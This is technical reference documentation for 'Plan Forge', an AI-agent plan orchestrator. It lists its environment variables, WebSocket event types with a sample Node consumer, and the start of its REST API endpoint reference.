ANTHROPIC_API_KEY 🔒 | string | (none) | per-user | You want Claude models directly (not via GitHub Copilot). | Secret. Prefer .forge/secrets.json. |
OPENCLAW_API_KEY 🔒 | string | (none) | per-user | openclaw.endpoint is set in .forge.json and PreAgentHandoff should authenticate. | Secret. Prefer .forge/secrets.json. |
GITHUB_TOKEN 🔒 | string | (none) | per-user | forge_meta_bug_file, forge_classifier_issue, or forge_github_metrics needs to call the GitHub API. gh auth status is the easier path when the GitHub CLI is installed. | Secret. Use a fine-scoped token; repo + issues is enough. |
OPENBRAIN_KEY 🔒 | string | (none) | per-user | OpenBrain replay needs authenticated access (rare; OpenBrain is local-first). | Secret. Prefer .forge/secrets.json. |
Set this group when your organization routes model calls through Azure OpenAI for billing, residency, or governance reasons. The keys are read by cost-service.mjs for pricing, by the orchestrator for invocation, and by forge_doctor_quorum for quota preflight (when PFORGE_FOUNDRY_QUOTA_PREFLIGHT=1).
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
AZURE_OPENAI_ENDPOINT | string (URL) | (none) | per-user | Routing through Azure OpenAI. | Not secret, but reveals tenant name. Example: https://my-resource.openai.azure.com/. |
AZURE_OPENAI_API_KEY 🔒 | string | (none) | per-user | Key-based auth (not Managed Identity). | Secret. Prefer AZURE_AUTH_MODE=managed-identity when possible. |
AZURE_OPENAI_DEPLOYMENT | string | (none) | per-user | You need to override the deployment name parsed from the model spec. | Not secret. |
AZURE_OPENAI_API_VERSION | string | (none) | per-user | You need a specific Azure OpenAI API version (e.g. 2024-02-01). | Not secret. |
AZURE_OPENAI_DEPLOYMENT_TYPE | enum | "global" | per-user | Pricing is regional or data-zone rather than global. Read by cost-service.mjs. | Not secret. |
AZURE_OPENAI_ACCOUNT_NAME | string | (none) | per-user | Foundry quota preflight needs the account name (also accepts AZURE_OPENAI_RESOURCE_NAME as an alias). | Not secret. |
AZURE_SUBSCRIPTION_ID | string (GUID) | (none) | per-user | Foundry quota preflight or any Azure-RM call. | Not secret. |
AZURE_RESOURCE_GROUP | string | (none) | per-user | Foundry quota preflight needs the resource group. | Not secret. |
AZURE_AUTH_MODE | string | (unset) | per-user | Switching between key-based and identity-based auth. Common values: managed-identity, service-principal, cli. | Not secret. |
Set these only if the defaults collide with something else on your machine, or when you need to harden the dashboard bridge with an auth token.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
PLAN_FORGE_HTTP_PORT | number | 3100 | per-machine | Port 3100 is taken by another service. | Not secret. |
PLAN_FORGE_WS_PORT | number | 3101 | per-machine | Port 3101 is taken (the WebSocket hub). | Not secret. |
PFORGE_DASHBOARD_PORT | number | 3100 | per-machine | The CLI needs to open the dashboard on a non-default port (read by pforge open-dashboard). | Not secret. |
PFORGE_DASHBOARD_URL | string (URL) | http://127.0.0.1:3100/dashboard | per-machine | The screenshot capture script needs to point at a remote dashboard. | Not secret. |
PFORGE_BRIDGE_SECRET 🔒 | string | (none) | per-machine | You want to require authentication on the MCP bridge endpoints (recommended on multi-user hosts). | Secret. Use 32+ random bytes. |
PFORGE_AUTH_TOKEN 🔒 | string | (none) | per-machine | You want to require a bearer token on the REST API (see MCP Server Reference — REST API). | Secret. Use 32+ random bytes. |
Mostly read internally. PLAN_FORGE_PROJECT is the only one you might set yourself, and almost always only in tests.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
PLAN_FORGE_PROJECT | string (path) | process.cwd() | per-session | Pointing the orchestrator at a project directory other than the working directory (mostly tests). | Not secret. |
PFORGE_ENV | string | "dev" | per-machine | You want LiveGuard and the run journal to tag runs with an env label other than dev. | Not secret. |
PFORGE_LOG_LEVEL | enum | (unset = info) | per-session | Debugging, set to debug to surface cost-service tracing and other diagnostic logs. | Not secret. |
PFORGE_NO_UPDATE_CHECK | boolean (1/0) | (unset) | per-machine | CI environment where reaching out to GitHub for an update check is unwanted. | Not secret. |
Tune these only when defaults are biting, usually on slow CI runners or when a long-running gate (large vitest suite, integration test, browser test) hits the wall.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
PFORGE_GATE_TIMEOUT_MS | number (ms) | (see orchestrator.mjs) | per-session | A gate's test suite takes longer than the default to run. | Not secret. |
PFORGE_WORKER_TIMEOUT_MS | number (ms) | (see orchestrator.mjs) | per-session | A worker (slice executor) needs more wall-clock than the default. | Not secret. |
PFORGE_WORKER_OUTPUT_IDLE_MS | number (ms) | (see orchestrator.mjs) | per-session | A worker is legitimately silent for long stretches (large builds) but should not be killed. | Not secret. |
PFORGE_BASH_PATH | string (path) | (auto-detected) | per-machine | Windows host with bash in a non-standard location. Plan Forge cannot find bash.exe on PATH and the auto-detection fails. | Not secret. |
Opt-in switches for experimental subsystems and bypasses for hardening rails. Most users never touch these.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
PFORGE_DISABLE_TEMPERING | boolean (1/0) | (unset) | per-session | You need to bypass Tempering scans for one run (e.g. running an audit-loop slice that would scan its own scaffolding). | Not secret. Use sparingly, this disables quality scans. |
PFORGE_FOUNDRY_QUOTA_PREFLIGHT | boolean (1/0) | (unset) | per-machine | You want the orchestrator to check Foundry quota before dispatching slices to an Azure OpenAI deployment. | Not secret. |
PFORGE_GATE_LINT_STRICT | boolean (1/0) | 0 | per-session | You want gate-lint findings to be hard failures rather than warnings. | Not secret. |
PFORGE_DRAIN_ON_INIT | boolean (true/false) | true | per-machine | You do not want the MCP server to drain the Tempering queue on startup (CI runners that start and stop the server many times). | Not secret. |
PFORGE_ALLOW_MASTER_COMMIT | boolean (1/0) | (unset) | per-session | You explicitly want to allow a commit on master while a run-plan is active (PreCommit hook normally blocks this). | Not secret. Discouraged, the guard exists for a reason. |
PFORGE_NETWORK_LOG_ONLY | boolean (1/0) | 1 | per-session | network.allowed is set and you want the in-process proxy to stay in log-only mode. When 1, the proxy records contacted hostnames but does not block connections. | Not secret. Default-on while allowlist enforcement remains advisory. |
PFORGE_COST_MODEL | string | (auto-detected) | per-session | You want to pin slice pricing to a specific model (subscription mode, e.g. flat Copilot pricing, or a non-default vendor). | Not secret. |
Standard OTel variables. When OTEL_EXPORTER_OTLP_ENDPOINT is set, the MCP server auto-enables tracing and ships spans to the configured collector. See Compliance & Data Residency — Observability Export for the full collector setup.
| Variable | Type | Default | Scope | Set when | Security |
|---|---|---|---|---|---|
OTEL_ENABLED | boolean (true/1) | (unset) | per-machine | You want to force-enable OTel even without an endpoint (useful for local console exporter). | Not secret. |
OTEL_EXPORTER_OTLP_ENDPOINT | string (URL) | (unset) | per-machine | You want spans shipped to an OTLP collector. Setting this implicitly turns OTel on. | Not secret if the collector is internal; treat as secret if the URL embeds a token. |
OTEL_SERVICE_NAME | string | "plan-forge-mcp" | per-machine | You run multiple Plan Forge instances and need distinct service names in your APM. | Not secret. |
Plan Forge reads these to figure out which IDE or agent CLI is hosting it, so the orchestrator can pick the right routing default and the right model surface. You should never set these yourself, they are populated automatically by the host. Listed here for transparency only.
| Variable | Type | Default | Source | What it tells Plan Forge | Security |
|---|---|---|---|---|---|
NODE_ENV | enum | (unset) | Node.js convention | test short-circuits hub init and notifications side-effects; production tightens logging. | Not secret. |
VSCODE_PID | number (PID) | (set by VS Code) | VS Code | Plan Forge is running inside VS Code. | Not secret. |
VSCODE_AGENT_MODE | string | (set by VS Code) | VS Code Agent Mode | enterprise means VS Code Agents Enterprise, Plan Forge picks a different default model route. | Not secret. |
TERM_PROGRAM | string | (set by terminal) | Terminal | vscode or cursor trigger host-specific routing. | Not secret. |
CLAUDECODE | string | (set by Claude Code) | Claude Code CLI | 1 means Plan Forge is running under Claude Code. | Not secret. |
CLAUDE_CODE_ENTRYPOINT | string | (set by Claude Code) | Claude Code CLI | Alternate signal for Claude Code detection. | Not secret. |
CURSOR_TRACE_ID | string | (set by Cursor) | Cursor | Plan Forge is running under Cursor; cross-checked with TERM_PROGRAM=cursor. | Not secret. |
ZED_TERM | string | (set by Zed) | Zed editor | Plan Forge is running under Zed. | Not secret. |
pforge)These variables are set by the CLI or the orchestrator for the duration of one invocation and then unset. Do not set them in your shell profile, they are documented for transparency and for users writing extensions.
| Variable | Type | Set by | Read by | Purpose | Security |
|---|---|---|---|---|---|
PFORGE_CHILD_MODE | boolean (1/0) | MCP server when it spawns a child Node process | server.mjs | Suppresses double-binding of HTTP/WS ports in the child. | Not secret. |
PFORGE_RUN_PLAN_ACTIVE | boolean (1/0) | pforge run-plan | PreCommit hook | Tells the master-branch commit guard that the commit is part of an authorised run. | Not secret. |
PFORGE_QUORUM_TURN | boolean (1/0) | Orchestrator during quorum dispatch | PreAgentHandoff hook | Skips LiveGuard context injection during quorum fan-out (one of the documented v3.5+ PreAgentHandoff bypasses). | Not secret. |
ORG_RULES_FORMAT · ORG_RULES_OUTPUT | string | pforge org-rules | orchestrator | Tells forge_org_rules what format and output path to use. | Not secret. |
FORGE_SMOKE | boolean (1/0) | CI smoke-test job | vitest skipIf gate | Enables long-running smoke tests (default off in CI). | Not secret. |
When a setting has multiple sources, the orchestrator resolves in this order, first one that yields a non-empty value wins:
--quorum=power).Model: claude-opus-4.7)..forge/secrets.json for the keys listed in the Provider API Keys table..forge.json for the keys listed in Appendix T.orchestrator.mjs or capabilities.mjs.One concrete example. OPENAI_API_KEY is resolved by checking process.env first, then falling back to .forge/secrets.json#OPENAI_API_KEY. The dashboard's Config → Secrets tab writes the latter; CI runners typically rely on the former. Both work; the env-var wins when both are set.
A representative shell setup for a developer on Windows running a hybrid Azure-OpenAI / Anthropic stack with the dashboard on a non-default port:
# Provider keys (better: store in .forge/secrets.json)
$env:ANTHROPIC_API_KEY = "sk-ant-..."
$env:OPENAI_API_KEY = "sk-..."
# Azure OpenAI alternative routing
$env:AZURE_OPENAI_ENDPOINT = "https://contoso-aoai.openai.azure.com/"
$env:AZURE_OPENAI_API_VERSION = "2024-02-01"
$env:AZURE_OPENAI_DEPLOYMENT_TYPE = "global"
$env:AZURE_AUTH_MODE = "managed-identity"
# Non-default ports (3100/3101 conflicted with another local service)
$env:PLAN_FORGE_HTTP_PORT = "3110"
$env:PLAN_FORGE_WS_PORT = "3111"
$env:PFORGE_DASHBOARD_PORT = "3110"
# Tracing to a local OTel collector
$env:OTEL_EXPORTER_OTLP_ENDPOINT = "http://127.0.0.1:4318"
$env:OTEL_SERVICE_NAME = "plan-forge-mcp-dev"
# Lift gate timeout for a long-running integration suite
$env:PFORGE_GATE_TIMEOUT_MS = "600000" # 10 minutes
.forge.json Reference, the per-project config file that pairs with this appendix..forge.json, env vars, and instruction files interact when settings conflict.PFORGE_AUTH_TOKEN gates..forge/secrets.json and the canonical source for the provider-key whitelist.ERR_NO_API_KEY, ERR_TESTBED_NOT_FOUND, and the gate-timeout family.
Every event Plan Forge emits over the WebSocket hub and the run journal, grouped by family, with emitter, trigger, the key payload fields, consumers, and retention. This appendix is the ebook companion to the canonical schema at pforge-mcp/EVENTS.md: the source-of-truth JSON examples live in the schema file; this page provides the orientation, classification, and lifecycle guidance that schema files rarely carry.
ws://127.0.0.1:3101. Three different consumers read the same stream: the dashboard (live UI), the run journal (.forge/runs/*.jsonl for replay), and external bridges (Telegram, Slack, OpenClaw). Adding a new consumer is a matter of opening a socket and filtering by type; the schema below tells you exactly what fields each consumer can rely on.
Plan Forge emits 38 distinct event types across eight families. The two most-watched families are lifecycle (run/slice progression) and LiveGuard (drift, incidents, secret scans). The remaining six families round out the picture: skills, Crucible, bridge approvals, escalation/CI, the lone client→server message, and the Tempering validation event.
| Family | Count | What it tells you |
|---|---|---|
| Lifecycle | 7 | Run and slice progression, the primary signal the dashboard renders on the Progress tab. |
| Skills | 4 | Per-step skill execution, surfaces the same Progress UI but for forge_run_skill rather than forge_run_plan. |
| Crucible | 3 | Idea→spec smelt progression; powers the Forge-Master and Crucible dashboard tabs. |
| Bridge | 4 | External-channel approvals and notification dispatch status (Telegram, Slack, Discord, webhooks). |
| Escalation & CI | 2 | Quorum escalation and GitHub Actions dispatch. |
| Client→server | 1 | The single inbound message type clients can send (set-label). |
| LiveGuard | 10 | Drift, incidents, secret scans, watch snapshots, fix proposals, the production-ops feedback loop. |
| Tempering | 1 | The bug-fix validation event, emitted only on the green leg of the bug lifecycle. |
Every emitted event shares a five-field envelope (documented below). Two enums, source and security_risk, are referenced throughout. Subscription mechanics are at Consuming the stream, and retention rules for events that escape the WebSocket (logged to .forge/runs/, posted to OpenClaw, etc.) are at Retention.
Every event, lifecycle, skill, LiveGuard, all of them, carries the same five-field envelope. Consumers can rely on these fields being present even on event types this catalog does not list (forward-compatible by design).
| Field | Type | Example | Purpose |
|---|---|---|---|
version | string | "1.0" | Schema version. Always "1.0" today; reserved for future breaking changes. |
type | string | "slice-completed" | The event-type identifier, the column heading you filter on. Stable across releases. |
timestamp | string (ISO-8601 UTC) | "2026-05-18T09:30:00.000Z" | Emission time. Always UTC; never local time. |
source | enum (9 values) | "orchestrator" | Which subsystem emitted the event, see below. |
security_risk | enum (5 values) | "none" | Risk classification at emission time, see below. Defaults to "none". |
source enumThe nine subsystems that emit events. New subsystems are added rarely; existing values are never repurposed.
| Value | Subsystem |
|---|---|
orchestrator | Plan execution engine in orchestrator.mjs, emits the lifecycle family. |
worker | Per-slice child process. Rare, most worker telemetry is wrapped by the orchestrator. |
hub | The WebSocket hub itself, emits connected on new sessions. |
bridge | External notification bridge, emits bridge-notification-*. |
liveguard | The LiveGuard subsystem, emits the entire LiveGuard family. |
crucible | The idea→spec funnel, emits crucible-smelt-*. |
skill | Skill runner, emits the skill family. |
watcher | Cross-project watcher, emits watch-*. |
audit | Audit-classifier loop. Rare, emits reclassification events when run. |
security_risk enumThe risk classification attached to every event at emission time. Subscribers (and OpenClaw) can filter by this field to focus on high-risk activity.
| Value | Meaning | Typical event types |
|---|---|---|
none | Routine lifecycle activity with no security implication. | slice-started, slice-completed, skill-* |
low | Activity that touches managed secrets or external networks but is expected. | bridge-notification-sent, ci-triggered |
medium | Quorum dispatch, agent handoff, escalation, outside the routine path but authorised. | slice-escalated, approval-requested |
high | Drift or incident events that warrant a human glance. | liveguard-incident, liveguard-secret-scan (when findings present) |
critical | Reserved for active-incident escalations, emitted by the audit subsystem only. | (none in default catalog) |
source: "orchestrator" (one exception). The Progress tab on the dashboard is driven entirely by this family; the run journal at .forge/runs/<run-id>.jsonl persists every one of them for replay.
| Event | Emitter | Trigger | Key payload |
|---|---|---|---|
connected | hub | A client opens a WebSocket connection to ws://127.0.0.1:3101. | clientId, label, historySize (how many past events are about to be replayed). |
run-started | orchestrator | runPlan() begins. | plan, mode, model, sliceCount, executionOrder. |
slice-started | orchestrator | A slice begins execution (after its gate passes). | sliceId, title. |
slice-completed | orchestrator | A slice passes all validation gates. | sliceId, status: "passed", duration (ms), tokens (in/out + model), cost_usd. |
slice-failed | orchestrator | A slice or its validation gate fails after retry budget exhausted. | sliceId, status: "failed", error, failedCommand. |
run-completed | orchestrator | All slices finish (mixed pass/fail allowed). | status, results (passed/failed counts), totalDuration, cost, sweep, analyze, report. |
run-aborted | orchestrator | Execution aborted via forge_abort. | sliceId (the slice that was running), reason. |
Full JSON examples: EVENTS.md — Event Types.
source: "skill". Emitted by skill-runner.mjs on every forge_run_skill invocation. The structure mirrors lifecycle events deliberately: dashboard code reuses the same renderer for both families.
| Event | Trigger | Key payload |
|---|---|---|
skill-started | Skill begins execution. | skillName, stepCount, args. |
skill-step-started | A skill step begins. | skillName, stepNumber, stepName. |
skill-step-completed | A skill step finishes (pass or fail). | stepNumber, stepName, status, duration. |
skill-completed | All skill steps finish. | skillName, status, stepsPassed, stepsFailed, totalDuration. |
source: "crucible". Emitted as smelts progress through the idea→hardened-spec funnel. The payload is wrapped in a data object, matching the LiveGuard convention rather than the flat-payload lifecycle convention, consumers should branch on family rather than assume one shape.
| Event | Trigger | Key payload (under data) |
|---|---|---|
crucible-smelt-started | forge_crucible_submit creates a new smelt. | id, lane, source. |
crucible-smelt-updated | forge_crucible_ask records an answer and advances the interview. | id, questionIndex, totalQuestions. |
crucible-smelt-finalized | forge_crucible_finalize claims a phase number and writes docs/plans/Phase-NN.md. | id, phaseName, planPath. |
source: "bridge". Emitted by the notification bridge when it pauses for external approval or dispatches a webhook. Configure the bridge via the extensions/ notify-* extensions and PFORGE_BRIDGE_SECRET (see Appendix U — Server Ports).
| Event | Trigger | Key payload |
|---|---|---|
approval-requested | The bridge pauses execution and requests external approval. | runId, plan, channels, timeoutMinutes. |
approval-received | An external approval callback is received. | runId, action (approve / deny), approver. |
bridge-notification-sent | A webhook notification is successfully dispatched to a channel. | channel, platform, eventType, status: "sent". |
bridge-notification-failed | A webhook dispatch fails (network error, bad status, etc.). | channel, error. |
source: "orchestrator". Two events that mark deliberate routing decisions: quorum escalation when a slice's complexity score exceeds the threshold, and CI dispatch when a plan run triggers a GitHub Actions workflow.
| Event | Trigger | Key payload |
|---|---|---|
slice-escalated | A slice is escalated to quorum for multi-model consensus review. | sliceId, reason, models (array of model IDs). |
ci-triggered | A CI workflow is dispatched from a plan run. | workflow, ref, inputs. |
The only inbound message type the hub honours. Send it once after opening the WebSocket to identify your client in the session registry (visible in the dashboard's Connections badge).
| Message | Purpose | Payload |
|---|---|---|
set-label | Update the client's label in the session registry. | { "type": "set-label", "label": "my-dashboard" } |
source: "liveguard". The production-ops feedback family, emitted by forge_drift_report, forge_incident_capture, forge_alert_triage, forge_secret_scan, forge_fix_proposal, and the watcher tools. Most carry security_risk: "low" or higher; filter on security_risk >= medium to drive paging.
| Event | Trigger | Key payload (under data) | Default risk |
|---|---|---|---|
liveguard-drift | Drift score changes. | score, delta, violations, timestamp. | low (escalates with delta) |
liveguard-incident | An incident is captured or resolved. | id, severity, description, status. | high |
liveguard-triage | forge_alert_triage runs. | alertCount, topSeverity, rankedAlerts. | medium |
liveguard-secret-scan | A secret scan completes. | clean, findingsCount, scannedAt. | none if clean; high if findings. |
liveguard-tool-completed | Any LiveGuard tool finishes executing. | tool, status, durationMs. | none |
fix-proposal-ready | forge_fix_proposal generates a new fix plan. | fixId, plan (path to LIVEGUARD-FIX plan), source. | medium |
watch-snapshot-completed | forge_watch builds a snapshot of a target project. | target, runState, runId, anomalyCount, cursor, counts. | none |
watch-anomaly-detected | forge_watch detects one or more anomalies (one event per invocation, not per anomaly). | target, runId, anomalies (array of {code, severity, message}). | medium (escalates with severity) |
watch-advice-generated | forge_watch analyze-mode produces narrative advice from a frontier model. | target, runId, model, tokensIn, tokensOut, durationMs, advicePreview. | low |
Anomaly codes used in watch-anomaly-detected: stalled, tokens-zero, high-retries, slice-failed, all-skipped, gate-on-prose, model-escalated, quorum-dissent, quorum-leg-stalled, skill-step-failed.
source: "audit". One event, emitted only on the green leg of the bug lifecycle, when forge_bug_validate_fix confirms all scanners pass re-run. There is no matching tempering-bug-validated-broken; the validation tool returns the result to the caller without emitting on the red leg, to keep the dashboard's Bugs Fixed tile a positive-only feed.
| Event | Trigger | Key payload (under data) |
|---|---|---|
tempering-bug-validated-fixed | forge_bug_validate_fix confirms a bug is fixed, all scanners pass re-run. | bugId, scanner, verdict: "fixed", attempt (timestamp, scanners array, result). |
The simplest possible consumer, a Node script that prints every event:
import WebSocket from "ws";
const ws = new WebSocket("ws://127.0.0.1:3101");
ws.on("open", () => {
ws.send(JSON.stringify({ type: "set-label", label: "my-consumer" }));
});
ws.on("message", (raw) => {
const evt = JSON.parse(raw.toString());
// Filter however you like:
if (evt.security_risk === "high" || evt.security_risk === "critical") {
console.error(`[HIGH] ${evt.type}`, evt);
} else if (evt.type?.startsWith("slice-")) {
console.log(`[LIFECYCLE] ${evt.type} sliceId=${evt.sliceId} status=${evt.status ?? ""}`);
}
});
On connection the hub replays buffered events from the in-memory ring (default ~500 events, see hub.mjs). To enable bearer-token auth on the hub, set PFORGE_BRIDGE_SECRET, the consumer then sends Authorization: Bearer <secret> on the upgrade request.
Events live in up to four places after emission. The retention rules below tell you how long each consumer keeps them, and which fields each consumer can rely on having.
| Sink | What is kept | Retention | How to read it |
|---|---|---|---|
| WebSocket hub (in-memory ring) | All events. | ~500 events (oldest evicted). Wiped on hub restart. | Connect to ws://127.0.0.1:3101; the hub replays the ring on connected. |
| Run journal | Lifecycle, skill, escalation, CI, everything tied to a runId. | Forever (until you delete the file). One JSONL per run at .forge/runs/<run-id>.jsonl. | forge_home_snapshot, or jq over the JSONL file. |
| LiveGuard cache | The most recent liveguard-drift, liveguard-secret-scan, liveguard-incident snapshots. | One snapshot per type at .forge/liveguard-*.json, overwritten on next emission. | forge_drift_report, forge_secret_scan (returns the cached snapshot when within cacheMaxAgeMinutes). |
| OpenClaw analytics (opt-in) | Whatever the PreAgentHandoff hook posts, typically a roll-up of drift, MTTR, and open incidents. | Determined by the OpenClaw deployment; not Plan Forge's responsibility. | OpenClaw API. |
openclaw, configuring the optional OpenClaw analytics sink.PFORGE_BRIDGE_SECRET, PLAN_FORGE_WS_PORT, and other env vars that gate hub access.postSlice, preDeploy, etc.).
Every REST endpoint the Plan Forge MCP server exposes, grouped by subsystem, with verb, path, request body shape, response shape, and status codes. The companion to Appendix V — Event Catalog (which covers the WebSocket side) and Appendix Q — API Surface Index (which catalogs the MCP tool surface).
pforge-mcp/server.mjs serves three concurrent surfaces on the same process: stdio MCP for IDE agents, REST + WebSocket on port 3100 for the dashboard and any external integration, and a Forge-Master HTTP surface for the conversational entrypoint. This appendix covers the REST + Forge-Master surfaces; the MCP tool surface is documented in Appendix Q.
Plan Forge exposes ~91 REST endpoints across 16 subsystems. Every one of the 106 MCP tools can also be invoked over REST through the generic dispatcher (POST /api/tool/:name), the explicit endpoints below are the "first-class" surfaces the dashboard and CLI use, with response shapes shaped for direct UI consumption rather than tool-call envelopes.
| Subsystem | Count | What it covers |
|---|---|---|
| Discovery | 4 | Liveness, version, capability manifest, well-known endpoint. |
| Plan execution & runs | 10 | List/trigger/abort plan runs, traces, replay, plans, workers. |
| Cost | 1 | Token-spend report across providers and months. |
| Search, timeline, hub | 3 | Cross-surface search, unified timeline, WebSocket upgrade. |
| Memory (L1/L2/L3) | 7 | Capture, drain, search, presets, OpenBrain stats and replay. |
| Crucible | 10 | Idea smelt lifecycle (submit, ask, preview, finalize, abandon, governance). |
| LiveGuard | 14 | Drift, incidents, deploy journal, regression guard, runbooks, hotspots, triage, secret scan, dep watch, env diff. |
| Quorum & fix proposals | 4 | Read/write quorum prompts, list/propose fix plans. |
| Tempering & bugs | 3 | Tempering artifact, bug stub from finding, bug list. |
| Skills (decision tray) | 5 | Pending decisions, accept/reject/defer, full skill catalog. |
| Inner loop | 7 | Reviewer calibration, gate suggestions, cost anomalies, proposed fixes, federation. |
| Bridge & approvals | 3 | Pending approvals, programmatic + browser-link approval. |
| Copilot integration | 5 | copilot-instructions.md read/preview/sync, OpenClaw snapshot/config. |
| GitHub & team coordination | 4 | GitHub metrics, readiness, team dashboard, team activity. |
| Notifications, audit, dashboard, settings | 13 | Notification config, audit config/drain, dashboard state, config, secrets, extensions, update, server restart. |
| Generic MCP dispatcher | 3 | The POST /api/tool/:name escape hatch that exposes any of the 106 MCP tools over REST. |
| Forge-Master | 10 | The conversational entrypoint, chat sessions, prompts, prefs, cache stats. |
| Image generation | 1 | Generate images via xAI Grok Aurora or OpenAI DALL-E. |
The trust model is local user. The server binds explicitly to 127.0.0.1 (loopback only) and runs no authentication layer of its own, the operating system's user account is the access boundary. Concretely:
app.listen(HTTP_PORT, "127.0.0.1", ...), remote hosts cannot reach the API; only processes running as the same OS user can.3100 by default; override with PLAN_FORGE_HTTP_PORT (see Appendix U — Server Ports).http://127.0.0.1:3100/dashboard share the same origin.PFORGE_BRIDGE_SECRET, see Bridge & approvals.If you need to expose the API beyond loopback (rare; usually it's the wrong solution), put a reverse proxy in front of it that handles TLS and authentication. Do not change the bind address; it's a deliberate safety boundary.
POST/PUT endpoints expect Content-Type: application/json. The server uses express.json() with default 100 KB body limit; payloads larger than that return 413 Payload Too Large.
Endpoint handlers wrap exceptions in a consistent envelope:
// 4xx / 5xx
{
"error": "Human-readable message",
"code": "OPTIONAL_MACHINE_CODE", // e.g. ASK_QUESTION_MISMATCH, PLAN_ALREADY_EXISTS
"details": { ... } // optional structured context
}
Status codes follow standard HTTP semantics: 400 for malformed input, 404 for missing resources, 409 for state conflicts (most common in Crucible finalize), 413 for body limits, 500 for unexpected server errors. The complete error-code table lives in the Errors & Exit Codes appendix (forthcoming Appendix X).
Lightweight endpoints intended for liveness checks, build identification, and capability negotiation. These are safe to poll, none of them allocate workers or write files.
| Method | Path | Purpose | Response |
|---|---|---|---|
| GET | /.well-known/plan-forge.json | Public discovery manifest | { version, capabilities, dashboard } |
| GET | /api/capabilities | Full capability catalog (mirrors forge_capabilities) | { tools[], workflows[], config, memory } |
| GET | /api/version | Running server version | { version, framework, build } |
| GET | /api/status | Liveness + last error | { ok, lastError, uptimeMs } |
The lifecycle surface for pforge run-plan. Triggering a run returns immediately with a run ID; subscribe to the lifecycle event family over the WebSocket hub for progress.
| Method | Path | Purpose | Request / response notes |
|---|---|---|---|
| GET | /api/runs | List recent runs (last 50) | Returns { runs: [{ id, plan, status, startedAt, endedAt }] }. |
| GET | /api/runs/latest | Latest run with full status | Includes current slice, gate result, cost so far. |
| GET | /api/runs/:runIdx | Specific run by index | runIdx matches .forge/runs/<idx>.jsonl. |
| POST | /api/runs/trigger | Kick off a plan run | Body: { plan, mode, quorum, assisted, dryRun, escalate }. Returns { runIdx, pid }. |
| POST | /api/runs/abort | Abort the active run | Body: { runIdx? } (defaults to current). Sends SIGTERM, then SIGKILL after grace. |
| GET | /api/replay/:runIdx/:sliceId | Session replay log for a slice | Returns the journaled stdout/stderr stream for one slice, used by the dashboard's session-replay view. |
| GET | /api/plans | Enumerate hardened plans | Walks docs/plans/ and parses Scope Contract headers. |
| GET | /api/workers | Active worker processes | PIDs, model, slice, elapsed. |
| GET | /api/traces | List execution traces (run index) | Top-level summary: run, slice count, gate pass/fail. |
| GET | /api/traces/:runId | Trace detail for one run | Per-slice timing, model, tokens in/out, cost. |
Plan Forge tracks token spend per provider, per model, per run, aggregated monthly. The single REST endpoint mirrors forge_cost_report; richer estimation lives in MCP tools (see Generic MCP dispatcher).
| Method | Path | Purpose | Response |
|---|---|---|---|
| GET | /api/cost | Cost report (token spend per model + monthly aggregation) | { thisMonth, lastMonth, perModel: {...}, perRun: [...] } |
Estimation endpoints (forge_estimate_quorum, forge_estimate_slice) are MCP-only; invoke via POST /api/tool/<name>.
Cross-surface search and the unified timeline are the dashboard's primary navigation aids. The hub endpoint is where browsers (and any other client) upgrade to a WebSocket to receive live events, see Appendix V — Consuming the Stream for a Node example.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/search | Cross-surface search (plans, events, bugs, incidents, memory) | Query string: ?query=&source=&limit=. Returns { hits: [{ source, recordRef, snippet, score, timestamp }], total, truncated, message }, the gold-standard ACI shape. |
| GET | /api/timeline | Unified event timeline | Cursor-paged: ?cursor=&limit=. Merges nine sources (runs, slices, deploys, incidents, drift, memory, bugs, crucible, tempering). |
| GET | /api/hub | WebSocket upgrade for live events | HTTP GET returns hub status + client count; same path accepts Upgrade: websocket for streaming. |
The capture-and-recall surface that backs OpenBrain integration and the auto-skills system. See Chapter 22 — How the Shop Remembers for the architectural overview.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/memory | Memory landing, recent captures + state | Dashboard primary view. |
| GET | /api/memory/report | Aggregate stats | Captures/day, hit rate, top thoughts. |
| POST | /api/memory/search | Search L2 captures (and L3 if OpenBrain configured) | Body: { query, limit, source? }. |
| POST | /api/memory/capture | Capture a thought | Body: { content, tags, source }. Broadcasts memory-captured hub event. |
| POST | /api/memory/drain | Drain pending memory queue | Forces a flush of buffered captures to disk + L3. |
| GET | /api/memory/presets | Capture-rule presets | Predefined tag bundles (debugging, architecture, etc.). |
| GET | /api/brain/stats | OpenBrain integration stats | L3 connection state, capture count, embedding model. |
The conversational planner surface. The full lifecycle is submit → ask → preview → finalize. See Chapter 5 — Crucible (Idea Smelting) for the workflow.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| POST | /api/crucible/submit | Start a new smelt | Body: { idea, source? }. Returns { smeltId, firstQuestion }. |
| POST | /api/crucible/ask | Answer current question, get next | Body: { smeltId, answer, questionId? }. Mismatched questionId returns 409 ASK_QUESTION_MISMATCH. |
| GET | /api/crucible/preview | Render current draft + unresolved fields | Query: ?smeltId=. Returns plan draft + criticalGaps[]. |
| POST | /api/crucible/finalize | Atomically claim phase + write plan file | Returns 409 + criticalGaps[] if gaps remain; 409 + PLAN_ALREADY_EXISTS if file exists (pass overwrite: true). |
| POST | /api/crucible/abandon | Mark smelt abandoned | Frees the phase number for the next smelt. |
| GET | /api/crucible/list | List all smelts (filter by status) | Query: ?status=draft|finalized|abandoned. |
| GET | /api/crucible/config | Read Crucible config | Interview model, question budget, autopilot threshold. |
| POST | /api/crucible/config | Write Crucible config | Partial updates merged into .forge.json#crucible. |
| GET | /api/crucible/manual-imports | List manually-imported smelts | Spec Kit, hand-authored briefs. |
| GET | /api/crucible/governance | Governance summary | Autopilot rate, fallback rate, mean question count. |
The production-companion surface. Every endpoint here emits at least one event in the LiveGuard event family; subscribe over the hub to see real-time alerts.
| Method | Path | Purpose | Notes |
|---|---|---|---|
| GET | /api/drift | Current drift score vs architecture rules | Returns { score, breakdown, asOf }. Score range 0–100. |
| GET | /api/drift/history | Drift trend over time | One entry per forge_drift_report invocation. |
| GET | /api/incidents | List incidents (severity, MTTR) | Sorted newest first; includes resolution timestamp + MTTR ms. |
| POST | /api/incident | Capture a new incident | Body: { title, severity, source, body }. Emits liveguard-incident. |
